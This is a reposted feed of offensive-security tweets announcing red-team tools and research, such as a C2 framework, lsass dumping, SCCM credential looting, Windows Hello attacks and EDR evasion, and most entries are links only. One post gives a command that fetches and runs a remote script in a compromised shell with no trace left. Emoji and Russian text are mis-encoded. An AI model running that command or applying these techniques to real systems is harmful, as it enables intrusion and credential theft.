π [ SpecterOps @SpecterOps ]
Do you like BloodHound & PowerShell? Do you want to automate all things BloodHound?
Check out @SadProcessor's new blog post diving into a new PowerShell module he created, & instructions on how to get started ‡οΈ
π https://posts.specterops.io/bloodhound-operator-dog-whispering-reloaded-156020b7c5e9
π https://github.com/SadProcessor/BloodHoundOperator
π₯ [ tweet ]
Do you like BloodHound & PowerShell? Do you want to automate all things BloodHound?
Check out @SadProcessor's new blog post diving into a new PowerShell module he created, & instructions on how to get started ‡οΈ
π https://posts.specterops.io/bloodhound-operator-dog-whispering-reloaded-156020b7c5e9
π https://github.com/SadProcessor/BloodHoundOperator
π₯ [ tweet ]
π₯3π₯±2
π [ Cube0x0 @cube0x0 ]
Over a year ago, I left my position at WithSecure to start a new journey, create something new, and do my own thing. Today, I'm excited to publicly announce what I've been working on all this time.
Introducing 0xC2, a cross-platform C2 framework targeting Windows, Linux, and MacOS environments:
π https://0xc2.io
The first release was back in late 2023, initially only offered to a small circle of red teamers and soon, the registration will be open for new clients who provide threat simulation services.
All agents are written as PIC in C to provide better opsec and to allow operators to be more flexible when designing payloads. To make the agents modular and fully customizable, operators can create a user-defined virtual table that can be hooked by the agent. This can be used to change the default behavior of an agent or extend capabilities, from adding internal commands to implementing P2P protocols.
More details will be available soon.
π₯ [ tweet ]
Over a year ago, I left my position at WithSecure to start a new journey, create something new, and do my own thing. Today, I'm excited to publicly announce what I've been working on all this time.
Introducing 0xC2, a cross-platform C2 framework targeting Windows, Linux, and MacOS environments:
π https://0xc2.io
The first release was back in late 2023, initially only offered to a small circle of red teamers and soon, the registration will be open for new clients who provide threat simulation services.
All agents are written as PIC in C to provide better opsec and to allow operators to be more flexible when designing payloads. To make the agents modular and fully customizable, operators can create a user-defined virtual table that can be hooked by the agent. This can be used to change the default behavior of an agent or extend capabilities, from adding internal commands to implementing P2P protocols.
More details will be available soon.
π₯ [ tweet ]
π9π₯1
Forwarded from ΠΠ»ΠΎΠ³ Kaimi & d_x
ΠΠΊΡΠΏΠ»ΡΠ°ΡΠ°ΡΠΈΡ ΡΠΎΡΡΠΎΡΠ½ΠΈΡ Π³ΠΎΠ½ΠΊΠΈ Π² Β«ΡΠ°ΠΏΠ°Π»ΠΊΠ°Ρ
Β» Π² Telegram
https://kaimi.io/2024/08/exploit-race-condition-in-telegram-mini-apps/
https://kaimi.io/2024/08/exploit-race-condition-in-telegram-mini-apps/
Misc
ΠΠΊΡΠΏΠ»ΡΠ°ΡΠ°ΡΠΈΡ ΡΠΎΡΡΠΎΡΠ½ΠΈΡ Π³ΠΎΠ½ΠΊΠΈ Π² Β«ΡΠ°ΠΏΠ°Π»ΠΊΠ°Ρ
Β» Π² Telegram - Misc
ΠΠΊΡΠΏΠ»ΡΠ°ΡΠ°ΡΠΈΡ ΡΠΎΡΡΠΎΡΠ½ΠΈΡ Π³ΠΎΠ½ΠΊΠΈ (race condition) Π² βΡΠ°ΠΏΠ°Π»ΠΊΠ°Ρ
β Π² Telegram Mini Apps (Blum, CalmMe ΠΈ Π΄ΡΡΠ³ΠΈΡ
)
π₯4π₯±1
π [ Nic Losby @ DEFCON @Blurbdust ]
And a small update, generation is over halfway and will actually finish! A release of a torrent should be out before the end of the year!
π₯ [ tweet ][ reply ]
(ΠΏΡΠΎ ΡΠ΅ ΡΠ°ΠΌΡΠ΅ ΡΠ°Π΄ΡΠΆΠ½ΡΠ΅ ΡΠ°Π±Π»ΠΈΡΡ crack.sh π³οΈβπ)
And a small update, generation is over halfway and will actually finish! A release of a torrent should be out before the end of the year!
π₯ [ tweet ][ reply ]
(ΠΏΡΠΎ ΡΠ΅ ΡΠ°ΠΌΡΠ΅ ΡΠ°Π΄ΡΠΆΠ½ΡΠ΅ ΡΠ°Π±Π»ΠΈΡΡ crack.sh π³οΈβπ)
π5π€―3
π [ Michael Schwarz @misc0110 ]
With the #GhostWrite CPU vulnerability, all isolation boundaries are broken - sandbox/container/VM can't prevent GhostWrite from writing and reading arbitrary physical memory on affected RISC-V CPUs. Deterministic, fast, and reliable - no side channels.
π https://ghostwriteattack.com/
π₯ [ tweet ]
With the #GhostWrite CPU vulnerability, all isolation boundaries are broken - sandbox/container/VM can't prevent GhostWrite from writing and reading arbitrary physical memory on affected RISC-V CPUs. Deterministic, fast, and reliable - no side channels.
π https://ghostwriteattack.com/
π₯ [ tweet ]
π’4
π [ CCobπ΄σ §σ ’σ ·σ ¬σ ³σ Ώ @_EthicalChaos_ ]
Thanks to @_dirkjan for agreeing to share the stage with me for our talk on Windows Hello abuse. I have now made the repo public for those who want to have a play around with Shwmae. I promise, I'll get a README for it next week π
π https://github.com/CCob/Shwmae
π₯ [ tweet ]
Thanks to @_dirkjan for agreeing to share the stage with me for our talk on Windows Hello abuse. I have now made the repo public for those who want to have a play around with Shwmae. I promise, I'll get a README for it next week π
π https://github.com/CCob/Shwmae
π₯ [ tweet ]
π₯6
π [ Orange Tsai π @orange_8361 ]
Thrilled to release my latest research on Apache HTTP Server, revealing several architectural issues!
Highlights include:
β‘ Escaping from DocumentRoot to System Root
β‘ Bypassing built-in ACL/Auth with just a '?'
β‘ Turning XSS into RCE with legacy code
π https://blog.orange.tw/2024/08/confusion-attacks-en.html
π₯ [ tweet ]
Thrilled to release my latest research on Apache HTTP Server, revealing several architectural issues!
Highlights include:
β‘ Escaping from DocumentRoot to System Root
β‘ Bypassing built-in ACL/Auth with just a '?'
β‘ Turning XSS into RCE with legacy code
π https://blog.orange.tw/2024/08/confusion-attacks-en.html
π₯ [ tweet ]
π8π₯±6π₯4π€1
π [ Ricardo Ruiz @RicardoJoseRF ]
Last week I made public TrickDump, a tool to dump lsass using only NTAPIS without creating a Minidump file, generating instead 3 JSON and 1 ZIP file with the memory region dumps. Check it out here:
π https://github.com/ricardojoserf/TrickDump
π₯ [ tweet ]
Last week I made public TrickDump, a tool to dump lsass using only NTAPIS without creating a Minidump file, generating instead 3 JSON and 1 ZIP file with the memory region dumps. Check it out here:
π https://github.com/ricardojoserf/TrickDump
π₯ [ tweet ]
π₯9π₯±3
π [ OtterHacker @OtterHacker ]
I've published my #defcon32 workshop!
If you want to develop your own "Perfect DLL Loader", you will have all you need in it. From the classic minimal loader to a fully featured one, this workshop in 6 steps is a journey inside the Windows internals!
π https://github.com/OtterHacker/Conferences/tree/main/Defcon32
π₯ [ tweet ]
I've published my #defcon32 workshop!
If you want to develop your own "Perfect DLL Loader", you will have all you need in it. From the classic minimal loader to a fully featured one, this workshop in 6 steps is a journey inside the Windows internals!
π https://github.com/OtterHacker/Conferences/tree/main/Defcon32
π₯ [ tweet ]
π₯7π2π₯±1
π [ Bad Sector Labs @badsectorlabs ]
Dropped a new tool at DEF CON 32! Loot SCCM Distribution points via HTTP with
We've found credentials, certificates, custom apps, keystores, etc. What will you find?
π https://github.com/badsectorlabs/sccm-http-looter
π₯ [ tweet ]
Dropped a new tool at DEF CON 32! Loot SCCM Distribution points via HTTP with
We've found credentials, certificates, custom apps, keystores, etc. What will you find?
π https://github.com/badsectorlabs/sccm-http-looter
π₯ [ tweet ]
π₯6
π [ klez @KlezVirus ]
[RELEASE] Following the talk at DEF CON, I'm releasing all the POC projects associated with DriverJack. More info in the repos. For any additional info, hit me up ;)
π https://github.com/klezVirus/DriverJack
π https://github.com/klezVirus/RpcProxyInvoke
π https://github.com/klezVirus/koppeling-p
π₯ [ tweet ]
[RELEASE] Following the talk at DEF CON, I'm releasing all the POC projects associated with DriverJack. More info in the repos. For any additional info, hit me up ;)
π https://github.com/klezVirus/DriverJack
π https://github.com/klezVirus/RpcProxyInvoke
π https://github.com/klezVirus/koppeling-p
π₯ [ tweet ]
π7π₯2
π [ Dirk-jan @_dirkjan ]
At Def Con I presented with @_EthicalChaos_ on new Windows Hello attacks. For ex: how to use the WinHello crypto keys from a low priv session to request a PRT on a different device, bypassing TPM protection of PRTs.
Slides:
π https://dirkjanm.io/talks/
PoC:
π https://github.com/dirkjanm/ROADtools/tree/master/winhello_assertion
π₯ [ tweet ]
At Def Con I presented with @_EthicalChaos_ on new Windows Hello attacks. For ex: how to use the WinHello crypto keys from a low priv session to request a PRT on a different device, bypassing TPM protection of PRTs.
Slides:
π https://dirkjanm.io/talks/
PoC:
π https://github.com/dirkjanm/ROADtools/tree/master/winhello_assertion
π₯ [ tweet ]
π₯3
π [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]
RELEASE:
This should be the 1st command you execute on a remote shell π§¨
Makes the BASH hack-ready. Lots of neat commands + apt-like static binary download ('bin nmap', ...).
LEAVES NO TRACE (memory only).
π https://github.com/hackerschoice/hackshell
π₯ [ tweet ]
RELEASE:
This should be the 1st command you execute on a remote shell π§¨
source <(curl -SsfL https://thc.org/hs)
Makes the BASH hack-ready. Lots of neat commands + apt-like static binary download ('bin nmap', ...).
LEAVES NO TRACE (memory only).
π https://github.com/hackerschoice/hackshell
π₯ [ tweet ]
π15π₯4
Offensive Xwitter
π [ Daniel @0x64616e ] Lol, blocking the loading of EDR drivers with WDAC actually works. π₯ [ tweet ][ quote ]
π [ Yarden Shafir @yarden_shafir ]
Another method that still works on most EDRs is HVCIDisallowedImages reg key that blocks drivers by filename.
Can take multiple filenames, but requires HVCI to be enabled + reboot.
π₯ [ tweet ][ quote ]
Another method that still works on most EDRs is HVCIDisallowedImages reg key that blocks drivers by filename.
Can take multiple filenames, but requires HVCI to be enabled + reboot.
π₯ [ tweet ][ quote ]
π13
π [ Dazzy @dazzyddos ]
Wrote a blog post on abusing exclusions to evade AVs/EDR which is stealthy, effective and an often overlooked topic.
π https://medium.com/seercurity-spotlight/abusing-av-edr-exclusions-to-evade-detections-21fe31d7ed49
π₯ [ tweet ]
Wrote a blog post on abusing exclusions to evade AVs/EDR which is stealthy, effective and an often overlooked topic.
π https://medium.com/seercurity-spotlight/abusing-av-edr-exclusions-to-evade-detections-21fe31d7ed49
π₯ [ tweet ]
π’4π₯2
π [ Logan Goins @shellph1sh ]
Created another write-up, this time on NTLM relay attacks to LDAP(S), including details of WebClient coercion, NTLM transport vulnerabilities, and finally device takeover after achieving authentication. You can read about it on my blog :)
π https://logan-goins.com/2024-07-23-ldap-relay/
π₯ [ tweet ]
Created another write-up, this time on NTLM relay attacks to LDAP(S), including details of WebClient coercion, NTLM transport vulnerabilities, and finally device takeover after achieving authentication. You can read about it on my blog :)
π https://logan-goins.com/2024-07-23-ldap-relay/
π₯ [ tweet ]
π₯6π₯±4π1
π [ wei @XiaoWei___ ]
MSRC fixed a RCE bug in TCPIP module.
I found the bug several months ago.
Its score is 9.8 and exploitation is more likely. Please apply the patch immediately.
π₯ [ tweet ]
MSRC fixed a RCE bug in TCPIP module.
I found the bug several months ago.
Its score is 9.8 and exploitation is more likely. Please apply the patch immediately.
π₯ [ tweet ]
π€―12π₯3π2
π [ Synacktiv @Synacktiv ]
In our latest blogpost, @croco_byte explores the inner workings of SCCM policies and introduces SCCMSecrets[.]py, a tool targeting secret policies in order to exploit misconfigurations, harvest credentials, and pivot across collections by impersonating legitimate clients.
π https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial
π₯ [ tweet ]
In our latest blogpost, @croco_byte explores the inner workings of SCCM policies and introduces SCCMSecrets[.]py, a tool targeting secret policies in order to exploit misconfigurations, harvest credentials, and pivot across collections by impersonating legitimate clients.
π https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial
π₯ [ tweet ]
π₯±6π4
π [ π π π π π π @felixm_pw ]
How many of you are down the bottom? π
π₯ [ tweet ]
How many of you are down the bottom? π
π₯ [ tweet ]
π8π2π€2π’2